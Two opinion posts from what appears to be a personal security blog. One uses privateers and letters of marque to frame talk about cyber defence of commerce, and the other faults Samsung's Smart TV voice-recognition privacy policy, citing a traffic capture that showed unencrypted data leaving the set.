Describing pirates’ options as binary alignment-or-be-executed is crazy when you also put it in frame of carrying dual or more allegiances. One of the most famous cases in American history involves ships switching flags to the side winning at sea in order to get a piece of the spoils on their return to the appropriate port. The situation, in brief, unfolded (pun not intended) when two American ships came upon an American ship defeating a British one. The two approaching ships switched to British flags, chased off the American, then took the British ship captive switched flags back to American and split the reward from America under “letters of marque”. Eventually in court the wronged American ship proved the situation and credit was restored. How many cases went unknown?

The presenter after his talk backed away from defending facts that were behind the conclusions. He said he just read navy history lightly and was throwing out ideas for a keynote, so I let it drop as he asked. Shame, really, because I had been tossing out some thoughts on this topic for a while and it seems like a good foundation for debate. Another point I would love to discuss some day in terms of cybersecurity is why so many navy sailors converted to being pirates (hint: more sailors died transporting slaves than slaves died en route).

My own talks on piracy and letters of marque were in London, Oct 2012, San Francisco, Feb 2013 and also Mexico City, Mar 2013. They didn’t generate much response so I did not push the topic further. Perhaps I should bring them back again or submit updates, given how some have been talking about national concerns with cyber to protect commerce.

If I did present on this topic again, I might start with an official record of discussion with President Nixon, February 8, 1974, 2:37–3:35 p.m. It makes me wonder if the idea “eventually navies take over” actually is a form of political persuasion, a politicized campaign, rather than any sort of prediction or careful reflection on history:

Dr. Gray: I am an old Army man. But the issue is not whether we have a Navy as good as the Soviet Union’s, but whether we have a Navy which can protect commerce of the world. This is our #1 strategic problem.

Adm. Anderson: Suppose someone put pressure on Japan. We couldn’t protect our lines to Japan or the U.S.-Japan shipping lanes.

The questions I should have asked the keynote speaker were not about historic accuracy or even the role of navies. Instead perhaps I should have gone straight to “do you believe in authoritarianism (e.g. fascism) as a valid solution to market risks”?

Posted in History, Sailing, Security.


Samsung TV: Would You Trust It?

Samsung is in a bit of a pickle. They want people to know that “voice recognition feature is activated using the TV’s remote control”. But let’s face it their disclaimer/warning that comes with a TV gave away the real story:

You can control your SmartTV, and use many of its features, with voice commands.

If you enable Voice Recognition, you can interact with your Smart TV using your voice. To provide you the Voice Recognition feature, some voice commands may be transmitted (along with information about your device, including device identifiers) to a third-party service that converts speech to text or to the extent necessary to provide the Voice Recognition features to you. In addition, Samsung may collect and your device may capture voice commands and associated texts so that we can provide you with Voice Recognition features and evaluate and improve the features. Please be aware that if your spoken words include personal or other sensitive information, that information will be among the data captured and transmitted to a third party through your use of Voice Recognition.

Nice attempt at raising awareness. Kudos for that. The first thing that jumps out at me is how vague the terms are. Second I noticed controls appear to be weak, or at least buried in some menu somewhere (“activated using your remote!” is basically meaningless). Third, Samsung clearly tries to dissuade you from disabling voice monitoring.

If you do not enable Voice Recognition, you will not be able to use interactive voice recognition features, although you may be able to control your TV using certain predefined voice commands. While Samsung will not collect your spoken word, Samsung may still collect associated texts and other usage data so that we can evaluate the performance of the feature and improve it.

You may disable Voice Recognition data collection at any time by visiting the “settings” menu. However, this may prevent you from using all of the Voice Recognition features.

So that’s a warning that your data can go somewhere, who knows where. On the other hand if you disable data collection you may be prevented from using all the features. Don’t you want all the features? Awful choice we have to make.

Samsung product management should be held accountable for a triad of failures. Really, a TV product manager should be in serious hot water. It is embarrassing in 2015 for a consumer product company of any size to make this large a mistake. We faced these issues at Yahoo product security ten years ago and I am seriously disappointed in Samsung. That also is why I find growing public outrage encouraging.

yahooTV
Yahoo! 2006 “Connected Life” Internet TV device

At Yahoo we had a large team focused on user privacy and safety. Research on Internet TV found novelty in a shared device with individual user privacy needs. On the mobile phone product managers could tell me “there is always only one user” and we would debate multi-user protections. But on the TV, oh the TV was different: multi-user risks were obvious to product managers and it was easy for them to take notice. The outrage against Samsung was easily predictable and avoidable.

Take for example typing your password on a big screen menu in front of a room. Everyone can see. The solution I created a decade ago was based on a simple concept: move user information to a disposable/agile security model instead of an expensive/static one. We developed a throwaway token option to register an account on the big screen instead of asking for a sensitive password.

Type your password into a private system, such as a laptop or phone, and the system sends you a number. You enter that number into the TV. Doesn’t matter if anyone sees the number. That was 2006 as we worked with TV manufacturers on how to keep data in public rooms on shared devices private. Yahoo dominated the Internet share of accounts (2 billion users) around this time so nearly every manufacturer would come through our process. Thus we could try to consult with them before bad code or devices were released.

Samsung should thought this through better on their own by now. For example commands used for the TV could require a keyword to “markup” listening, such as “Hello Samsung” and “Goodbye”. That phrase is basically never going to come up in casual conversation. Phones already do this. Remember CB radio? Lots of good verbal markup ideas there and who wouldn’t enjoy talking to their TV like a trucker?

Also important is visual indication that the TV is listening, such as an annoyingly bright LED that can’t be missed. And third a physical disable switch with tactic and visual feedback would be nice; like switching off an old Marshall amplifier. Perhaps a switch on the remote or a button that lights up like a big red “recording” indicator. And this doesn’t even get into fun answers to how the data is protected in memory, storage and over the wire.

Unfortunately Samsung just gave themselves a black eye instead. I would not buy another product from them until I have hard evidence their product management runs through a legitimate security team/review process. In fact I am now disposing of the Samsung device I did own and there’s a very high chance of migrating to another manufacturer.

Just for some comparison, notice how the camera and facial recognition were described:

Vague:

Your SmartTV is equipped with a camera that enables certain advanced features, including the ability to control and interact with your TV with gestures and to use facial recognition technology to authenticate your Samsung Account on your TV. The camera can be covered and disabled at any time, but be aware that these advanced services will not be available if the camera is disabled.

Specific:

The camera situated on the SmartTV also enables you to authenticate your Samsung Account or to log into certain services using facial recognition technology. You can use facial recognition instead of, or as a supplementary security measure in addition to, manually inputting your password. Once you complete the steps required to set up facial recognition, an image of your face is stored locally on your TV; it is not transmitted to Samsung. If you cancel your Samsung Account or no longer desire to use facial recognition, please visit the applicable settings menu to delete the stored image. While your image will be stored locally, Samsung may take note of the fact that you have set up the feature and collect information about when and how the feature is used so that we can evaluate the performance of this feature and improve it.


Updated Feb 23: David Lodge has dumped the network traffic and proved that it is indeed capturing and sending unencrypted text to Samsung. He writes:

What we see here is not SSL encrypted data. It’s not even HTTP data, it’s a mix of XML and some custom binary data packet.

The sneaky swines; they’re using 443/tcp to tunnel data over; most likely because a lot of standard firewall configurations allow 80 and 443 out of the network. I don’t understand why they don’t encapsulate it in HTTP(S) though.

Anyway, what we can see is it sending a load of information over the wire about the TV, I can see its MAC address and the version of the OS in use. After the word buffer_id is a load of binary data, which looks audio-ish, although I haven’t delved further into it yet.

Then, right at the bottom, we have the results:

sneaky swines

Posted in Security.